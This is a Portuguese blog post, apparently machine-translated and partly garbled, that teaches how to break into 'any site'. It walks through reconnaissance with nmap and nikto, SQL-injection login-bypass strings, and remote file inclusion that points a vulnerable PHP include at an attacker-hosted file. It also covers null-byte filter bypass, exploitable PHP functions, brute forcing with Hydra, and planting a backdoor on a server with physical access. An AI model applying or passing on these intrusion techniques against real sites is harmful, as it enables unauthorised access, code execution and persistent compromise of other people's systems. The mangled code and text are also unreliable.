invadir um site Básico do Básico

Como invadir um site?




Todos sabemos que o hacking nada mais é que a habilidade deste século. 
Então o que isso significa? ´

Isso significa que nem todos conseguem essa habilidade. para você ver como é privilegiado o hacking, em outras mãos é como um esporte, alguns nascem com talento, alguns têm que praticar muito para conseguir as habilidades necessárias.

Por que hackear um site? Não somos nós chapéu branco?

Mesmo no caso de você nunca ter tido sucesso antes de eu assumir que uma vez aqui você já sabe qual é o significado da foto acima (a imagem parece um pouco assustadora e mais como uma atitude de chapéu preto), a classificação dos hackers realmente não faz muito sentido, na minha opinião existem novatos, hackers, hackers especialistas e ainda pior os patins ao redor, mesmo como um chapéu branco (de acordo com o que o mundo define como chapéu branco) às vezes você vai encontrar-se em situações onde você tem que abrir um buraco * porque eles estão executando sites não humanos como pornografia infantil e etc.

ESTÁ BEM! Então, como hackear um site?

Existem diversos tutoriais em torno da internet sobre como hackear um site com uma ferramenta específica com tecnicas cagadas, aqui no ALPHA GROUP você também terá umas dicas legais sobre o assunto, mas no caso de você querer saber que você está no lugar certo ou não, basta olhar em volta, mas hoje eu quero compartilhar algo que eu acho que vai ser muito útil para você, agora vamos tomar uma xícara de café pegar uma cadeira e começar a ler isso, o que eu vou te mostrar hoje é totalmente diferente dos meus outros tutoriais, em vez de mostrar como usar essas ferramentas , vou orientá-lo sobre como você pode usar com sucesso essas ferramentas e truques para hackear qualquer site, com base em minhas experiências.
Abaixo está minha lista quando eu quero hackear um site

O reconhecimento




A razão pela qual muitos novatos e hackers não-profissionais não conseguem ter sucesso em um hacking é porque eles não querem esperar, na maioria das vezes eles querem um botão mágico onde eles possam clicar e isso é tudo, mas na realidade não funciona assim, a primeira coisa que você tem que fazer é um bom reconhecimento sobre o seu alvo, para aqueles familiarizados com o desenvolvimento de software é mais fácil entender o que eu quero dizer, você não pode desenvolver um bom software sem uma boa documentação, apenas como a UML na indústria de software aqui é a mesma, precisamos de informações sobre o alvo para facilitar nossas tarefas.

Meu conselho no Good Recon

Quais são os serviços que estão executando?
Descobre materiais como portas abertas, software e versões no servidor, e tenta procurar a exploração caso haja pelo menos um online, ou você pode apenas fazer sua própria exploração.
As ferramentas que eu recomendo para esta seção são nmap, whatweb e nikto e, claro, algumas outras feitas por Mr_ Nakup3nda ou por você.
Eles escreveram o roteiro sozinhos?
Caso eles escrevam sozinhos, procurem por scripts que façam a entrada do usuário, variem a listagem de diretórios, verifiquem o código-fonte, descubram como o site reage a entradas anormais, geralmente utilizo essas entradas:
ADMIN 'OU 1 = 1 # quando é uma URL de administrador como o site / admin / loign /
quando é um login normal, experimente os injetores sql tradicionais, como 
'OR' 1 '=' 1 '- 
' OR '1' = '1' ({ 
'OR' 1 '=' 1 '/ *
, mas não termina aqui, tente escrever instruções sql nas entradas, fazer eco de volta para você, tentar executar um comando baseado no sistema operacional do servidor, descobrir como o site filtrar as entradas e tentar ignorar os filtros.
E caso eles usem o código de outra pessoa, como o CMS, simplesmente pegue uma cópia dele e tente encontrar bugs por conta própria, ou encontre um exploit se eles usarem uma versão explorável do CMS.

O malvado Google




Às vezes eu hackear sites simplesmente com a ajuda de algumas pesquisas do Google, como hacker você deve saber como usar o google para coletar informações ou hackear, caso você não saiba, em breve colocarei como usar o google para hackear

Mudando o Código Fonte

Eu aposto que neste ponto você já sabe como ver o código fonte de uma página usando o truque do botão direito, só para lembrar que linguagens de script como php, perl, asp, python e assim por diante rodam no lado do servidor, então significa que você não pode ver clicando com o botão direito do mouse, a menos que seja uma plataforma de código aberto, onde você pode obter uma cópia e alterar todo o código.

Listagem de diretório

A navegação pelo índice pode ser muito útil ao tentar localizar arquivos que você normalmente não deveria ver, como arquivos de senhas, arquivos usados para administrar a página da web, arquivos de log, arquivos em que as informações são armazenadas.
você também pode verificar manualmente as URLs suspeitos assim: 
website.com/logs/ 
website.com/files/ 
website.com/sql/ 
website.com/secret/ 
você pode fazer ferramentas que irá automaticamente fazer isso por você, ferramentas como O dirbsuter pode ser muito útil para esta tarefa.

Meu amigo robots.txt




É muito importante fazer um hacker para dar uma olhada nesses arquivos, eu não vou explicar o uso do robots.txt (apenas google ele), eles geralmente nos levam a um monte de caminhos onde eles não querem que robôs vejam e as vezes eles são caminhos muito sensíveis.

Inclusão remota de arquivos

A vulnerabilidade de inclusão de arquivo é um tipo de vulnerabilidade mais encontrada em sites. Ele permite que um invasor inclua um arquivo, geralmente por meio de um script no servidor da Web. A vulnerabilidade ocorre devido ao uso de entrada fornecida pelo usuário sem validação adequada. Abaixo temos um pedaço de código php que abre um arquivo.
<? php 
if (! ($ hfile = fopen ("$ arquivo", "r")) 
echo ("erro não pode abrir o arquivo: $ arquivo <br /> \ n"); 
?> 
Este exemplo abre o arquivo com o nome especificado na entrada do usuário ($ file) 
.Isso significa que ele abre todos os arquivos que um invasor deseja abrir e, se permitir, url fopen está ATIVADO até mesmo em arquivos remotos. 
Procure exemplo neste trecho de código: 
Exemplo:
<? php 
include ($ dir. "/members.php"); 
?>
Basta criar um arquivo .members.php no seu servidor web e chamar o script assim: 
dir = http://www.server.com/
Ele irá executar o seu arquivo no servidor de destino. Importante é que você tenha o PHP desligado ou o código será executado no seu servidor.

ALPHA GROUP

O nome da nossa comunidade pode ser e é uma vulnerabilidade muito popular na vida hacker.
Vamos dizer que eles têm um script que pega o nome do arquivo e coloca ".txt" no final. Assim, o programador tenta certificar-se de que apenas arquivos txt possam ser abertos.
Mas o que dizer de um nome de arquivo como este: 
phppage.php% 00 
Irá chegar a: 
phppage.php% 00.txt 
Então fopen abre phppage.php% 00.txt ou? Não! E este é o ponto. As funções fopen param depois de 
".php" antes do ALPHA GROUP e só abrem "phppage.php". Então todo tipo de arquivo pode ser aberto. 
Scripts que permitem uploads (mas apenas para um determinado tipo de arquivo) também são um alvo em potencial para esse tipo de ataque.

Injeção SQL

Injeção SQL é uma técnica de injeção de código, usada para atacar aplicativos orientados a dados, nos quais instruções SQL maliciosas são inseridas em um campo de entrada para execução, na minha experiência pessoal, esse é o problema mais popular que você encontrará em sites, o problema é que alguns sites colocam essas informações em um banco de dados e nem todos os filtram.



Então, quando você ecoou de volta, a mensagem javascript será mostrada. 
Se eles estão apenas logados, a última parte deve causar um erro sql que pode nos dar muitas informações úteis. 
Você pode tentar o seguinte website.com/users.php?id=1 
e adicionar o '/ website.com/users.php?id=1' 
se ele lançar um erro de bingo, você está lá.

Forjarias de solicitação entre sites (CSRF) e injeção de comando

Sobre esse tipo de ataque eu também fiz um tutorial sobre como você pode continuar esse tipo de ataque

Funções PHP Exploráveis

Code Execution: 
require () - lê um arquivo e interpreta conteúdo como código PHP 
include () - lê um arquivo e interpreta conteúdo como código PHP 
eval () - interpreta string como código PHP 
preg () - se ele usa o modificador / e ele interpreta a string de substituição como código PHP
Execução de Comando: 
exec () - executa o comando + retorna a última linha do seu 
passthru de saída () - executa o comando + retorna sua saída ao navegador remoto 
(backticks) - executa o comando e retorna a saída em um array 
shellexec - executa o comando + retorna o resultado como string 
system () - executa o comando + retorna sua saída (da mesma forma que o passthru ()) 
.não suporta dados binários 
popen () - executa o comando + conecta sua saída ou fluxo de entrada a um descritor de arquivo PHP
File Disclosure: 
fopen () - abre um arquivo e o associa a um descritor de arquivo PHP 
readfile () - lê um arquivo e grava seu conteúdo diretamente no 
arquivo do navegador remoto () - lê um arquivo inteiro em um 
arquivo de matriz get contents () - lê o arquivo em uma string

Forçando Brute

Às vezes você tentará todos os métodos mencionados acima, mas alguns sites são realmente seguros e não há maneira fácil de explorá-los.



Muitas vezes isso não nos impede de hackeá-los, eles podem ter portas abertas executando alguns serviços, como ftp, telnet e assim por diante, tentar forçar a força bruta e obter a senha, Hydra é outra ferramenta incrível para esse tipo de tarefa.

Acesso Físico

Se você tem um acesso físico ao servidor, obtém tudo em suas mãos, seja discreto e deixe um backdoor nele e pronto.

Outros tipos de ataques que você também pode executar são:

Buffer Overflow 
estouro de pilha do 
estouro de número inteiro
E a lista é longa, eu só compartilhei o que eu tenho agora na minha mente, você também pode adicionar o seu nas seções de comentários ... até breve nos próximos tutoriais.



Hackeado por Mr_Nakup3nda

Nenhum comentário:

Postar um comentário

Recomendado